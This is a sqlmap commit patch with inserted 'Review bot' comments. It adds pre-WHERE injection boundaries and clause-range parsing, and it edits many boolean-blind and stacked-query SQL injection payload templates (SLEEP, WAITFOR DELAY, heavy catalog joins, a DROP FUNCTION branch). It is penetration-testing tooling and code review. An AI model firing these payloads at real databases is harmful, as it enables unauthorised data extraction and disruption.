From 35d9ed84769111738bb817e0914b01c559b7b82b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Sep 2018 10:30:58 +0200 Subject: [PATCH] Cleaning a mess with stacked queries and pre-WHERE boundaries --- lib/core/settings.py | 2 +- lib/parse/payloads.py | 4 ++ txt/checksum.md5 | 10 ++--- xml/boundaries.xml | 36 +++++++++++++++++ xml/payloads/boolean_blind.xml | 18 ++++----- xml/payloads/stacked_queries.xml | 68 ++++++++++++++++---------------- 6 files changed, 89 insertions(+), 49 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6a133d608..cdb05523a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.22" +VERSION = "1.2.9.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index ee4d8573d..6ea796060 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission """ import os +import re from xml.etree import ElementTree as et @@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): + if tag == "clause" and '-' in text: + text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text) + if tag in ("clause", "where"): text = text.split(',') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7cdd4e99d..0dd04c2cd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
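Review bot: An inverted range in a clause value such as `8-1` is silently turned into an empty string by the new `re.sub` in cleanupVals, because `xrange(8, 2)` yields nothing, so a mistyped payload definition loses its clause list and the payload is quietly never selected instead of failing at load time. The added lines only test `'-' in text` before substituting and never check that the lower bound is at most the upper bound. The module already imports `SqlmapInstallationException` (visible in the hunk header context), so the expansion can raise it on a malformed range and name the offending value; a small named function in place of the lambda makes room for that check. `xrange` ties this to Python 2, which appears to be what the file targets, so a later port will need to touch this line. The body of cleanupVals continues past the end of the hunk.
```python
def cleanupVals(text, tag):
    if tag == "clause" and '-' in text:
        def _expand(match):
            lo, hi = int(match.group(1)), int(match.group(2))
            if lo > hi:
                raise SqlmapInstallationException("invalid <clause> range '%s'" % match.group(0))
            return ','.join(str(_) for _ in xrange(lo, hi + 1))

        text = re.sub(r"(\d+)-(\d+)", _expand, text)

    # … unchanged: split of clause/where values on ',' …
```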
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1778dd902fbe5392377fd9b723898bbb lib/core/settings.py +4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py +f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 
@@ -471,13 +471,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml +3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml +1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml -3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml +82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index 8f2351412..857551e6b 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -413,6 +413,42 @@ Formats: '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )+' + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 2 + ||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )|| + + + + 5 + 9 + 1 + 1 + +(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] + )+ + + + + 5 + 9 + 1 + 2 + +(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )+ + diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 00ba460f6..7b9e5b46e 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -1386,7 +1386,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) 
@@ -1407,7 +1407,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) @@ -1428,7 +1428,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) @@ -1449,7 +1449,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 @@ -1469,7 +1469,7 @@ Tag: 1 3 1 - 0 + 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] @@ -1491,7 +1491,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) @@ -1513,7 +1513,7 @@ Tag: 1 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL @@ -1533,7 +1533,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;IIF([INFERENCE],1,1/0) @@ -1553,7 +1553,7 @@ Tag: 1 5 1 - 0 + 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END diff --git a/xml/payloads/stacked_queries.xml b/xml/payloads/stacked_queries.xml index 2ecd2ef49..1471df7d0 100644 --- a/xml/payloads/stacked_queries.xml +++ b/xml/payloads/stacked_queries.xml @@ -7,7 +7,7 @@ 4 2 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -28,7 +28,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) @@ -48,7 +48,7 @@ 4 3 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -69,7 +69,7 @@ 4 4 1 - 0 + 1-8 1 ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) @@ -89,7 +89,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -109,7 +109,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) @@ -128,7 +128,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) 
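Review bot: The new `1-8` clause values depend on the range expansion added to lib/parse/payloads.py in this same commit, and nothing in the payload file says so; a parser without that change would push `1-8` straight through `text.split(',')` as a single unexpanded token. A one-line comment at the top of the payload list, e.g. `<!-- <clause> accepts comma-separated values and inclusive ranges such as 1-8, expanded in lib/parse/payloads.py -->`, would document the contract for the next person editing these entries. Replacing `0` with `1-8` also leaves out `9`, which appears to be the value carried by the boundaries added to xml/boundaries.xml in this commit; if keeping stacked payloads away from those pre-WHERE boundaries is the point of the clean-up, the same comment should say so. The enclosing payload entries start and end outside each hunk.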
@@ -149,7 +149,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -169,7 +169,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -189,7 +189,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) @@ -208,7 +208,7 @@ 4 3 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -230,7 +230,7 @@ 4 5 1 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) @@ -251,7 +251,7 @@ 4 1 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -273,7 +273,7 @@ 4 4 1 - 0 + 1-8 1 ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' @@ -294,7 +294,7 @@ 4 1 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL @@ -314,7 +314,7 @@ 4 4 1 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL @@ -333,7 +333,7 @@ 4 2 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -353,7 +353,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL @@ -372,7 +372,7 @@ 4 4 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END @@ -392,7 +392,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END 
@@ -411,7 +411,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -431,7 +431,7 @@ 4 5 1 - 0 + 1-8 1 ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END @@ -450,7 +450,7 @@ 5 3 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -470,7 +470,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) @@ -489,7 +489,7 @@ 4 3 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -510,7 +510,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) @@ -530,7 +530,7 @@ 4 4 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE @@ -551,7 +551,7 @@ 4 5 2 - 0 + 1-8 1 ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE @@ -571,7 +571,7 @@ 5 4 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -591,7 +591,7 @@ 5 5 2 - 1,2,3,9 + 1-8 1 ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 @@ -610,7 +610,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END 
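Review bot: The `1,2,3,9` to `1-8` change in the `@@ -450`, `@@ -470`, `@@ -571` and `@@ -591` hunks does more than drop clause 9: it also enables these payloads for clauses 4 through 8, which the old value never listed, whereas every other hunk in this file only moves from `0`. These are the heavy-query payloads (a three-way join of the catalog tables), so assuming `clause` enumerates the injection positions a payload is tried in, which the hunk does not show, the target now receives that join in more positions per test. If the widening is intended it deserves an XML comment next to those entries, e.g. `<!-- heavy query: tried in clauses 1-8 (previously 1,2,3,9) -->`; otherwise `1,2,3` keeps the previous behaviour minus clause 9. The enclosing payload entries start and end outside these hunks.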
@@ -631,7 +631,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -651,7 +651,7 @@ 4 4 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END @@ -672,7 +672,7 @@ 4 5 2 - 0 + 1-8 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END